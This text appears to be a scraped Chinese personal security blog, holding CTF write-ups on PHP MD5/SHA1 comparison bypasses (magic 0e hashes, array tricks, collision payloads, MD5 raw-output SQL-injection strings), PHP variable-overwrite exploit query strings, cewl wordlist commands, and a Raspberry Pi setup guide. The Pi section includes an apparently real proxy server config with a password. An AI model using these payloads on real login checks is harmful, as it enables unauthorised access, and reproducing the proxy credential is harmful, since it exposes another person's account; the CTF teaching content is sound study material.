[+] RIPEMD-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] RAdmin v2.x
[+] NTLM
[+] Domain Cached Credentials(DCC)
[+] Domain Cached Credentials 2(DCC2)
[+] MD4
[+] MD2
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] Snefru-128
[+] Snefru-128(HMAC)
[+] HAVAL-128
[+] HAVAL-128(HMAC)
[+] Skein-256(128)
[+] Skein-512(128)
[+] MSCASH2
________________________________________________________________________________

字典

这两个网站获取
https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
https://weakpass.com/download
你还可以用crunch生成词典

还有一个工具cewl，可以爬取网站关键字生成密码字典，使用方法如下

#默认方法
#输入下列命令之后，爬虫会根据指定的URL和深度进行爬取，然后打印出可用于密码破解的字典：
cewl http://www.ignitetechnologies.in/

#保存字典文件
#为了方便大家记录，或者为将来的研究提供参考，Cewl可以将打印出的字典存储为文件。这里可以使用-w参数来将密码字典存储为text文件：
cewl http://www.ignitetechnologies.in/ -w dict.txt

#生成特定长度的字典
#如果你想生成指定长度的密码字典，你可以使用-m选项来设置：

cewl http://www.ignitetechnologies.in/ -m 9
#上述命令将生成长度至少为9位的密码。

#从网站中获取Email
#你可以使用-e选项来启用Email参数，并配合-n选项来隐藏工具在爬取网站过程中生成的密码字典：
cewl http://www.ignitetechnologies.in/ -n -e

#计算网站字典中重复的单词数量：
#如果你想要计算目标网站中某个词的重复出现次数，你可以使用-c选项来开启参数计算功能：
cewl http://www.ignitetechnologies.in/ -c

#增加爬取深度
#如果你想增加爬虫的爬取深度以生成更大的字典文件，你可以使用-d选项来指定爬取深度，默认的爬取深度为2：
cewl http://www.ignitetechnologies.in/ -d 3

#提取调试信息
#你可以使用--debug选项来开启调试模式，这样就可以查看网站爬取过程中出现的错误和元数据了：
cewl http://www.ignitetechnologies.in/ --debug

#Verbose模式
#为了扩展网站爬取结果，并获取更加完整的数据报告，你可以使用-v选项来进入verbose模式。该模式下，Cewl会导出目标网站的详细数据：
cewl http://www.ignitetechnologies.in/ -v

#生成包含数字和字符的字典
#如果你想生成包含数字和字符的字典文件，你可以在命令中使用–with-numbers选项：
cewl http://testphp.vulnweb.com/ --with-numbers

#Cewl摘要/基础认证
#如果目标网站需要进行页面登录认证的话，我们就要使用下列参数来绕过页面认证的限制：
#–auth_type:                      Digest or basic.
#–auth_user:                     Authentication username.
#–auth_pass:                     Authentication password.
cewl http://192.168.1.105/dvwa/login.php --auth_type Digest --auth_user admin--auth_pass password -v
#或者
cewl http://192.168.1.105/dvwa/login.php --auth_type basic --auth_user admin--auth_pass password -v

#代理URL
#如果目标网站设置了代理服务器的话，Cewl将无法使用默认命令来生成字典。此时你需要使用–proxy option选项来启用代理URL功能：
cewl --proxy_host 192.168.1.103 --proxy_port 3128 -w dict.txt http://192.168.1.103/wordpress/

md5

发表于 2021-09-17 更新于 2021-09-24

本文字数： 12k 阅读时长 ≈ 11 分钟

md5

第一层 The Fisrt Easy Md5 Challenge

MD5弱类型比较，这时候传入两个加密后开头为0e的不相等值就可以绕过了。

<?php
if($_POST['param1']!=$_POST['param2'] && md5($_POST['param1'])==md5($_POST['param2'])){
    die("success!");
}
?>

例：240610708、QNKCDZO，更多可以看看这个项目

1	param1=240610708&param2=QNKCDZO

同理

<?php
if (isset($_GET['Username']) && isset($_GET['password'])) {
    $logined = true;
    $Username = $_GET['Username'];
    $password = $_GET['password'];

     if (!ctype_alpha($Username)) {$logined = false;}
     if (!is_numeric($password) ) {$logined = false;}
     if (md5($Username) != md5($password)) {$logined = false;}
     if ($logined){
    echo "successful";
      }else{
           echo "login failed!";
        }
    }
?>

1	username=240610708&password=QNKCDZO

第二层 The Second Easy Md5 Challenge

为MD5强类型比较，这时候传入两个数组，数组的值不相等，造成MD5加密时报错产生NULL=NULL的情况，绕过比较。

<?php
if($_POST['param1']!==$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
    die("success!");
}
?>

1	param1[]=1&param2[]=a

第三层 Md5 Revenge Now!

为MD5强碰撞

<?php
if((string)$_POST['param1']!==(string)$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
    die("success!);
}
?>

param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
param2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

param1=%D11%DD%02%C5%E6%EE%C4i%3D%9A%06%98%AF%F9%5C%2F%CA%B5%87%12F%7E%AB%40%04X%3E%B8%FB%7F%89U%AD4%06%09%F4%B3%02%83%E4%88%83%25qAZ%08Q%25%E8%F7%CD%C9%9F%D9%1D%BD%F2%807%3C%5B%D8%82%3E1V4%8F%5B%AEm%AC%D46%C9%19%C6%DDS%E2%B4%87%DA%03%FD%029c%06%D2H%CD%A0%E9%9F3B%0FW%7E%E8%CET%B6p%80%A8%0D%1E%C6%98%21%BC%B6%A8%83%93%96%F9e%2Bo%F7%2Ap
param2=%D11%DD%02%C5%E6%EE%C4i%3D%9A%06%98%AF%F9%5C%2F%CA%B5%07%12F%7E%AB%40%04X%3E%B8%FB%7F%89U%AD4%06%09%F4%B3%02%83%E4%88%83%25%F1AZ%08Q%25%E8%F7%CD%C9%9F%D9%1D%BDr%807%3C%5B%D8%82%3E1V4%8F%5B%AEm%AC%D46%C9%19%C6%DDS%E24%87%DA%03%FD%029c%06%D2H%CD%A0%E9%9F3B%0FW%7E%E8%CET%B6p%80%28%0D%1E%C6%98%21%BC%B6%A8%83%93%96%F9e%ABo%F7%2Ap

第四层预定义常量

直接上题
CISCN2020全国大学生信息安全竞赛初赛easytrick

<?php
class trick{
    public $trick1;
    public $trick2;
    public function __destruct(){
        $this->trick1 = (string)$this->trick1;
        if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){
            die("你太长了");
        }
        if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){
            echo file_get_contents("/flag");
        }
    }
}
highlight_file(__FILE__);
unserialize($_GET['trick']);

其中下面这段代码会进行强制类型转换

1	(string)$this->trick1;

如果利用数组绕过，任何数组强转后为Array

<?php
$a = array();
$b = array("anyword","in","here");
$a=(string)$a;
$b=(string)$b;
var_dump($a);
var_dump($b);
?>

<?php
$a='NAN';
$b=NAN;
$a=(string)$a;
var_dump($a);
var_dump($b);
var_dump($a!==$b);
var_dump($a!=$b);
var_dump(md5($a)===md5($b));
?>

这里除了不是数字的数 NaN还有无穷大 Infinity也可以实现

或者

<?php
$a=0.040000000000000000832667268468867405317723751068115234375;
$b=0.0400000000000000077715611723760957829654216766357421875;
$a=(string)$a;
var_dump($a);
var_dump($b);
var_dump($a!==$b);
var_dump($a!=$b);
var_dump(md5($a)===md5($b));
?>
O:5:"trick":2:{s:6:"trick1";d:0.040000000000000000832667268468867405317723751068115234375;s:6:"trick2";d:0.0400000000000000077715611723760957829654216766357421875;}

反序列化

<?php
class trick{
    public $trick1;
    public $trick2;
    public function __construct(){
       $this->trick1='INF';
       $this->trick2=INF;
    }
}
$a=new trick();
echo urlencode(serialize($a));
//O%3A5%3A%22trick%22%3A2%3A%7Bs%3A6%3A%22trick1%22%3Bs%3A3%3A%22INF%22%3Bs%3A6%3A%22trick2%22%3Bd%3AINF%3B%7D

或者

<?php
class trick{
    public $trick1;
    public $trick2;
    public function __construct(){
       $this->trick1=0.040000000000000000832667268468867405317723751068115234375;
       $this->trick2=0.0400000000000000077715611723760957829654216766357421875;
    }
}
$a=new trick();
echo urlencode(serialize($a));
//O%3A5%3A%22trick%22%3A2%3A%7Bs%3A6%3A%22trick1%22%3Bd%3A0.040000000000000000832667268468867405317723751068115234375%3Bs%3A6%3A%22trick2%22%3Bd%3A0.0400000000000000077715611723760957829654216766357421875%3B%7D

第五层

依然是md5碰撞绕过

<?php
include('flag.php');
if (isset($_GET['src']))
highlight_file(__FILE__) and die();
if (isset($_GET['md5']))
{
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "Wonderbubulous! Flag is $flag";
else
echo "Nah... '",htmlspecialchars($md5),"' not the same as ",md5($md5);
}
?>

显然，此时的参数需要单层md5()与双层md5()后判断==，则我们需要找一个0e开头的纯数字字符串，这个字符串的MD5值依旧是0e开头的。

#!python2
import hashlib
import re
def MD5(data):
    return hashlib.md5(data).hexdigest()
def main():
    a = 100000000
    while True:
        data = '0e' + str(a)
        data_md5 = MD5(data)
        a = a + 1
        if(re.match('^0e[0-9]{30}',data_md5)):
            print(data)
            print(data_md5)
            break
        if(a % 1000000 == 0):
            print(a)
if __name__ == '__main__':
    main()

得到0e215962017

第六层

md5双碰撞绕过

<?php
if (isset($_GET['a']) && isset($_GET['b'])) {
  $a = $_GET['a'];
  $b = $_GET['b'];
  if ($a != $b && md5($a) == md5(md5($b)) {
    echo "flag{XXXXX}";
  } else {
    echo "wrong!";
  }
} else {
  echo 'wrong!';
}
?>

找一个0e开头的md5，md5后依然是0e开头，其实有很多！！！

1 2	a=s1885207154a，b=V5VDSHva7fjyJoJ33IQl md5("V5VDSHva7fjyJoJ33IQl") => 0e18bb6e1d5c2e19b63898aeed6b37ea => 0e0a710a092113dd5ec9dd47d4d7b86f

此处无法验证通过？！
来自颖奇L’Amore的博客的脚本

#Python2
import multiprocessing
import hashlib
import random
import string
import sys
CHARS = string.letters + string.digits
def cmp_md5(substr, stop_event, str_len, start=0, size=20):
    global CHARS
    while not stop_event.is_set():
        rnds = ''.join(random.choice(CHARS) for _ in range(size))
        md5 = hashlib.md5(rnds)
        value = md5.hexdigest()
        if value[start: start+str_len] == substr:
            print rnds        
            md5 = hashlib.md5(value)
            if md5.hexdigest()[start: start+str_len] == substr:
                print rnds+ "=>" + value+"=>"+ md5.hexdigest()  + "\n"
                stop_event.set()


if __name__ == '__main__':
    substr = sys.argv[1].strip()
    start_pos = int(sys.argv[2]) if len(sys.argv) > 1 else 0
    str_len = len(substr)
    cpus = multiprocessing.cpu_count()
    stop_event = multiprocessing.Event()
    processes = [multiprocessing.Process(target=cmp_md5, args=(substr,
                                         stop_event, str_len, start_pos))
                 for i in range(cpus)]
    for p in processes:
        p.start()
    for p in processes:
        p.join()

第七种

<?php
if (isset($_GET['passwd'])) {
        if (hash("md5", $_GET['passwd']) == '0e514198428367523082236389979035'){
            echo "<script>alert('$flag')</script>";
        } else {
            echo "<script>alert('Wrong!');</script>";
    }
}

爆出一个md5后面是纯数字的，当然240610708和QNKCDZO可解，但官方给的解很有意思，0e215962017 => 0e291242476940776845150308577824

1	/?passwd=0e215962017

md5+sql注入

当出现md5($password,true)并出现sql
可以使用ffifdyop

1	select * from admin where password=''or'6<乱码>'

或者4611686052576742364

1	select * from admin where password=''\|\|1#Æp.*.ÔÉ§@(.

或者129581926211651571912466741651878684928

1	select * from admin where password='.ÚT0D..o#ßÁ'or'8

还有个e58

1	select * from admin where password='Ï.c±R%'-'.)è5m©

既然有md5，sha1怎么能少

一，数组绕过

<?php
include('flag.php');
if(isset($_GET[a]) && isset($_GET[b]))
{
    $c = $_GET[a];
    $d = $_GET[b];
    if($c != $d && sha1($c)===sha1($d))
    {
        echo 'you got it<br>';
        echo $flag;
    }
    else
    {
        echo 'try again<br>';
        show_source(__FILE__);
    }
}
else
{
    show_source(__FILE__);
}

1	a[]=a&b[]=b

二，0e碰撞

<?php
include('flag.php');
if(isset($_GET[a]) && isset($_GET[b]))
{
    $c = (string)$_GET[a];
    $d = (string)$_GET[b];
    if($c != $d && sha1($c)==sha1($d))
    {
        echo 'you got it<br>';
        echo $flag;
    }
    else
    {
        echo 'try again<br>';
        show_source(__FILE__);
    }
}
else
{
    show_source(__FILE__);
}

>>> hashlib.sha1('10932435112').hexdigest()
'0e07766915004133176347055865026311692244'
>>> hashlib.sha1('aaroZmOk').hexdigest()
'0e66507019969427134894567494305185566735'

三，强碰撞

<?php
include('flag.php');
if(isset($_GET[a]) && isset($_GET[b]))
{
    $c = (string)$_GET[a];
    $d = (string)$_GET[b];
    if($c != $d && sha1($c)===sha1($d))
    {
        echo 'you got it<br>';
        echo $flag;
    }
    else
    {
        echo 'try again<br>';
        show_source(__FILE__);
    }
}
else
{
    show_source(__FILE__);
}

1
2

a=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&
b=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1

附：0e开头的md5和sha1

————————————————————————————————md5加密————————————————————————————————
240610708
QNKCDZO
s878926199a
s155964671a
s214587387a
s214587387a
s878926199a
s1091221200a
s1885207154a
s1502113478a
s1836677006a
s155964671a
s1184209335a
s1665632922a
s1502113478a
s1836677006a
s1091221200a
s155964671a
s1502113478a
s155964671a
s1665632922a
s155964671a
s1091221200a
s1836677006a
s1885207154a
s532378020a
s1502113478a
s1091221200a
s1665632922a
s1885207154a
s1836677006a
s1665632922a
s878926199a
s878926199a
s155964671a
s214587387a
s214587387a
0e215962017 ---> 0e291242476940776845150308577824
————————————————————————————————sha1加密————————————————————————————————
10932435112
aaroZmOk
aaK1STfY
aaO8zKZF
aa3OFF9m
————————————————————————————————双md5加密————————————————————————————————


CbDLytmyGm2xQyaLNhWn
md5(CbDLytmyGm2xQyaLNhWn) => 0ec20b7c66cafbcc7d8e8481f0653d18
md5(md5(CbDLytmyGm2xQyaLNhWn)) => 0e3a5f2a80db371d4610b8f940d296af
770hQgrBOjrcqftrlaZk
md5(770hQgrBOjrcqftrlaZk) => 0e689b4f703bdc753be7e27b45cb3625
md5(md5(770hQgrBOjrcqftrlaZk)) => 0e2756da68ef740fd8f5a5c26cc45064
7r4lGXCH2Ksu2JNT3BYM
md5(7r4lGXCH2Ksu2JNT3BYM) => 0e269ab12da27d79a6626d91f34ae849
md5(md5(7r4lGXCH2Ksu2JNT3BYM)) => 0e48d320b2a97ab295f5c4694759889f
cwInN1oNmfC9DHlS98IK
md5(cwInN1oNmfC9DHlS98IK) => 0ec72592bc6a2dfa71e7d5707db17d9e
md5(md5(cwInN1oNmfC9DHlS98IK)) => 0e1eb693f863872c444c94389f15b9b4
X1JDsxf7kSpw8RQrGEXF=>0e758ee17c82162e881d31f18689ed94=>0efcbd91c70c61aa0c0b03e0c1e8b81a
3XTWmRxMwi9u1wVvg0vh=>0e6c687f2018f20d2858e40184aaad07=>0ec537e214b745b91db911c1d8c1ee7f
EXNkvdJEfN7KXDTpiOxC=>0ea34836f164d37f08ca0

参考：1

php study 之变量覆盖

发表于 2021-09-15 更新于 2021-09-20

本文字数： 4.7k 阅读时长 ≈ 4 分钟

extract()变量覆盖

extract()函数从数组中将变量导入到当前的符号表。该函数使用数组键名作为变量名，使用数组键值作为变量值。针对数组中的每个元素，将在当前符号表中创建对应的一个变量。
函数定义如下：

1	int extract ( array $var_array [, int $extract_type [, string $prefix ]] )

其中，第二个参数指定函数将变量导入符号表时的行为，最常见的两个值是EXTR_OVERWRITE和EXTR_SKIP。
当值为EXTR_OVERWRITE时，在将变量导入符号表的过程中，如果变量名发生冲突，则覆盖所有变量；值为EXTR_SKIP则表示跳过不覆盖。若第二个参数未指定，则在默认情况下使用EXTR_OVERWRITE。
当extract()函数从用户可以控制的数组中导出变量且第二个参数未设置或设置为EXTR_OVERWRITE时，就存在变量覆盖漏洞。

test1

<?php
highlight_file(__FILE__);
include("flag.php");
$a = "0";
extract($_GET);
if ($a == 1) {
    echo $flag;
} else {
    echo "nonono";
}
?>

payload

?a=1

test2

<?php
highlight_file(__FILE__);
include("flag.php");
$test = "******extract_test******";
extract($_GET);
if(isset($gift)){
    $content = trim($test);
    if($gift == $content) {
        echo $flag;
    }
    else{
        echo "nonono";
    }}
?>

payload

1	?gift=a&test=a

parse_str()变量覆盖

parse_str()函数通常用于解析URL中的querystring，把查询字符串解析到变量中，如果没有array参数，则由该函数设置的变量将覆盖已存在的同名变量。
函数定义如下：

1	void parse_str ( string $str [, array &$arr ])

当parse_str()函数的参数值可以被用户控制时，则存在变量覆盖漏洞。
test1

<?php
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
$a = 'oop';
parse_str($_SERVER["QUERY_STRING"]);
if ($a == 'mi1k7ea') {
    echo $flag;
} else {
    echo "nonono";
}
?>

payload

1	?a=mi1k7ea

test2

<?php
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

$a = "www.mi1k7ea.com";
$id = $_GET['id'];
@parse_str($id);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
        echo $flag;
    } else {
        exit('nonono');
    }
?>

payload

1	?id=a[]=240610708

mb_parse_str()变量覆盖

mb_parse_str()函数用于解析GET/POST/COOKIE数据并设置全局变量，和parse_str()类似：

<?php
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

$a = 'oop';
mb_parse_str($_SERVER["QUERY_STRING"]);
if ($a == 'mi1k7ea') {
    echo $flag;
} else {
    echo "nonono";
}
?>

payload

1	?a=mi1k7ea

import_request_variables()变量覆盖

支持版本：PHP 4 >= 4.1.0, PHP 5 < 5.4.0
import_request_variables()函数将GET、POST、Cookies中的变量导入到全局。
函数定义如下：

1 2	bool import_request_variables (string $types [, string $prefix])

$type代表要注册的变量，G代表GET，P代表POST，C代表COOKIE，第二个参数为要注册变量的前缀。
使用这个函数只用简单地指定类型即可，这里G指定导入GET请求中的变量：

<?php
highlight_file(__FILE__);
//error_reporting(0);
include("flag.php");

$a = "0";
import_request_variables("G");
if ($a == 1) {
    echo $flag;
} else {
    echo "nonono";
}
phpinfo();
?>

$$导致的变量覆盖

$$即可变变量，一个可变变量获取了一个普通变量的值作为这个可变变量的变量名。
$与$$的区别
$var是一个正常变量，名称为：var，存储任何值，如：string，integer，float等。
$$var是一个引用变量，用于存储$var的值。
变量覆盖漏洞
$$导致的变量覆盖问题在CTF代码审计题目中经常在foreach中出现，如以下的示例代码，使用foreach来遍历数组中的值，然后再将获取到的数组键名作为变量，数组中的键值作为变量的值。因此就产生了变量覆盖漏洞。

<?php
highlight_file(__FILE__);
//error_reporting(0);
include("flag.php");

foreach (array('_COOKIE','_POST','_GET') as $_request)
{
    foreach ($$_request as $_key=>$_value)
    {
        $$_key=  $_value;
    }
}
$id = isset($id) ? $id : "test";
if($id === "jxswcy") {
    echo $flag;
} else {
    echo "nonono";
}
?>

传入id=jxswcy后，在foreach语句中，$_key为id，$_value为jxswcy，进而$$_key为$id，从而实现了变量覆盖：
将某题echo就可以看到

<?php
highlight_file(__FILE__);
//error_reporting(0);
include("flag.php");

$_403 = "Access Denied";
$_200 = "Welcome Admin";

if ( !isset($_POST["flag"]) ){
    die($_403);
}
foreach ($_GET as $key => $value){
    $$key = $$value;
    echo '$$key is '.$key."</br>";
    echo '$$value is '.$value."</br>";
    echo '$key is '.$key."</br>";
    echo '$value is '.$value."</br>";
}
foreach ($_POST as $key => $value){
    $$key = $value;
    echo '$$key is '.$key."</br>";
    echo '$key is '.$key."</br>";
    echo '$value is '.$value."</br>";
}
if ( $_POST["flag"] !== $flag )    {
    die($_403);
} else {
    echo "This is your flag : ". $flag . "\n";
    die($_200);
}
?>

#get
_200=flag
#POST
flag=anystrings

因为POST的参数必须为flag，则第二个foreach语句的$key为flag，进而$$key为$flag，从而得到$flag的值为POST传递的flag参数的值；这里因为第二个foreach语句修改了$flag原来的值为POST传递的flag参数的值，因而最后一个if语句的条件是恒不成立的，在其后的else代码块逻辑中echo输出出来的只能是修改了的$flag的值即POST传递的flag参数的值而非原本的$flag的值、接着输出$_200变量的值；要想输出原本的$flag的值，我们需要将原本的$flag覆盖$_200变量，因此在第一个foreach语句中通过GET输入_200=flag，从而得到的$$key为$_200、$$value为$flag，从而实现在修改$flag的值之前将其覆盖到$_200变量中。

$$key is _200
$$value is flag
$key is _200
$value is flag
$$key is flag
$key is flag
$value is anystrings

Raspberry Pi 折腾记

发表于 2021-09-11 更新于 2021-09-25

本文字数： 5.9k 阅读时长 ≈ 5 分钟

树莓派指南

1.硬件

SD卡

数据存储在SD卡，最低支持16G，最高支持128G，较高性价比SanDisk Ultra，一步到位SanDisk Extreme PRO

电源

任意15W电源接type-c线
供电bug
只能官方type-c线，第三方无法供电
cat /proc/cpuinfo
查看最后一行信息，Rev 1.2以上即可

Micro-HDMI

靠近电源口的Micro-HDMI为主接口

2.制作系统

官方系统下载
https://downloads.raspberrypi.org/raspios_full_armhf/images/
选择版本

烧录系统

windows 下
USB Image Tool 1.81 烧录
https://www.alexpage.de/usb-image-tool/download/
Device Mode 选择 Restore 选择写入zip文件
mac 下
https://www.balena.io/etcher/

使用SDFormatter可将sd卡恢复到初始状态

配置系统

进入系统
pinout #查看信息
htop
gpio -v

cat /proc/cpuinfo 查看serial cpu序列号
可以验证序列号避免授权

cpu当前状态
cat /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_cur_freq

设置窗口
取消再次设置

如果显示有问题
configuration中
system。underscan 默认enbale设置为disabled

更换源并更新

编辑 `/etc/apt/sources.list` 文件，删除原文件所有内容，用以下内容取代：

deb http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian/ buster main non-free contrib rpi
deb-src http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian/ buster main non-free contrib rpi

编辑 `/etc/apt/sources.list.d/raspi.list` 文件，删除原文件所有内容，用以下内容取代：

deb http://mirrors.tuna.tsinghua.edu.cn/raspberrypi/ buster main ui

检查 /etc/apt/sources.list.d/下有没有除了 raspi.list vscode.list的其他文件如akopytov_sysbench.list

sudo apt-get update

vnc配置

重设密码
vncpasswd
杀掉进程
vncserver -kill :1

vnc 错误

错误提示：cannot currently show the desktop
sudo vim /boot/config.txt
启用hdmi_force_hotplug=1

VNC默认使用TCP端口5900,如果你的vnc访问:192.168.1.203:1 那么他访问服务器的真正端口是5900+1=5901,防火墙关闭会无法连接

查看cpu温度
vcgencmd measure_temp

更新 EEPROM

Raspberry Pi 4具有SPI连接的EEPROM（4MBits / 512KB），其中包含用于启动系统的代码。可以通过更新树莓派的EEPROM获得新的功能和错误修复。
sudo apt install rpi-eeprom
sudo rpi-eeprom-update

安装输入法
sudo apt-get install fcitx fcitx-googlepinyin fcitx-module-cloudpinyin fcitx-sunpinyin

查看内核

uname -m
如果是armv7l为32位，aarch64为64位

启用64位内核

vim /boot/config.txt
最后加上
arm_64bit=1
保存退出重启

手动设置wifi
新建wpa_supplicat.conf

country=CN
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1

network={
ssid="WiFi-A"
psk="12345678"
key_mgmt=WPA-PSK
priority=1
}

network={
ssid="WiFi-B"
psk="12345678"
key_mgmt=WPA-PSK
priority=2
scan_ssid=1
}
#ssid:网络的ssid
#psk:密码
#priority:连接优先级，数字越大优先级越高（不可以是负数）
#scan_ssid:连接隐藏WiFi时需要指定该值为1

开启ssh
boot下新建 ssh

开启vnc
sudo raspo-config

sudo reboot

安装qmmp

安装截屏软件
sudo apt-get install flameshot -y

{
“server”:”c36s1.jamjams.net”,
“server_port”:9931,
“local_address”: “127.0.0.1”,
“local_port”:1080,
“password”:”LVNmsghRNN”,
“timeout”:600,
“method”:”aes-256-gcm”,
“fast_open”: false,
}

apt-get 错误
Hit:1 http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian buster InRelease
Hit:2 http://mirrors.tuna.tsinghua.edu.cn/raspberrypi buster InRelease
Ign:3 https://packagecloud.io/akopytov/sysbench/raspbian buster InRelease
Err:4 https://packagecloud.io/akopytov/sysbench/raspbian buster Release
404 Not Found [IP: 54.193.9.65 443]
Reading package lists… Done
E: The repository ‘https://packagecloud.io/akopytov/sysbench/raspbian buster Release’ does not have a Release file.
N: Updating from such a repository can’t be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.

vim /etc/apt/sources.list

安装树莓派监控(pi dashboard)

apt-get update && apt-get upgrade
apt-get install ansible -y
vim build_pi_dashboard.yml


---

- hosts: localhost

  vars:
     pd_dir:       /var/www/html/pi-dashboard
     database:            "{{ DATABASE | default('sqlite') }}"
     mysql_root_password: '{{ MYSQL_ROOT_PASSWORD }}'

  tasks:

     - name: Install Apache
       apt:
          name: apache2
          state: present
          update_cache: yes


     #######################################################
     # Install MySQL and associated packages, if required
     #######################################################

     - name: Install MySQL and associated packages for Raspbian Buster
       apt:
          pkg:
             - mariadb-server
             - python-mysqldb
             - php-mysql
          state: present
       when: database == 'mysql' and ansible_distribution_release == 'buster'

     - name: Install MySQL and associated packages for Raspbian Stretch
       apt:
          pkg:
             - mysql-server
             - python-mysqldb
             - php7.0-mysql
          state: present
       when: database == 'mysql' and ansible_distribution_release == 'stretch'

     - name: Install MySQL and associated packages for Raspbian Jessie
       apt:
          pkg:
             - mysql-server
             - python-mysqldb
             - php5-mysql
          state: present
       when: database == 'mysql' and ansible_distribution_release == 'jessie'



     #######################################################
     # Configure MySQL, if required
     #######################################################

     - name: Set the MySQL root password
       mysql_user:
          user: root
          password: '{{ mysql_root_password }}'
          host: localhost
       when: database == 'mysql'


     ###################################################
     # Install php packages required by wordpress
     ###################################################

     - name: Install php 7.3 packages for Raspbian Buster
       apt:
          pkg:
             - php
             - php-gd
             - sqlite
             - php-sqlite3
             - php-curl
             - php-zip
             - php-xml
             - php-mbstring
             - libapache2-mod-php
          state: present
       when: ansible_distribution_release == 'buster'

     - name: Install php 7.0 packages for Raspbian Stretch
       apt:
          pkg:
             - php7.0
             - php7.0-gd
             - php7.0-sqlite3
             - php7.0-curl
             - php7.0-zip
             - php7.0-xml
             - php7.0-mbstring
             - libapache2-mod-php7.0
          state: present
       when: ansible_distribution_release == 'stretch'

     - name: Install php 5 packages for Raspbian Jessie
       apt:
          pkg:
             - php5
             - php5-gd
             - php5-sqlite
             - php5-curl
          state: present
       when: ansible_distribution_release == 'jessie'




     ###################################################
     # Install pi-dashboard
     ###################################################

     - git:
         repo: 'https://github.com/spoonysonny/pi-dashboard.git'
         dest: '{{pd_dir}}'
         clone: yes

     - name: Set pi-dashboard directory ownerships
       file:
          path: '{{pd_dir}}'
          owner: www-data
          group: www-data
          mode: 0755
          recurse: yes


     - name: Restart Apache
       service:
          name: apache2
          state: restarted
          enabled: yes

#运行脚本
ansible-playbook –become -c local -i “localhost,” build_pi_dashboard.yml

proftpd_133c_backdoor漏洞

flag1

flag2

flag1

flag2

识别hash类型

字典

md5

第一层 The Fisrt Easy Md5 Challenge

第二层 The Second Easy Md5 Challenge

第三层 Md5 Revenge Now!

第四层 预定义常量

第五层

第六层

第七种

md5+sql注入

一，数组绕过

二，0e碰撞

三，强碰撞

extract()变量覆盖

parse_str()变量覆盖

mb_parse_str()变量覆盖

import_request_variables()变量覆盖

$$导致的变量覆盖

1.硬件

SD卡

电源

Micro-HDMI

2.制作系统

配置系统

编辑 /etc/apt/sources.list 文件，删除原文件所有内容，用以下内容取代：

编辑 /etc/apt/sources.list.d/raspi.list 文件，删除原文件所有内容，用以下内容取代：

vnc配置

vnc 错误

更新 EEPROM

查看内核

启用64位内核

安装树莓派监控(pi dashboard)

第四层预定义常量

编辑 `/etc/apt/sources.list` 文件，删除原文件所有内容，用以下内容取代：

编辑 `/etc/apt/sources.list.d/raspi.list` 文件，删除原文件所有内容，用以下内容取代：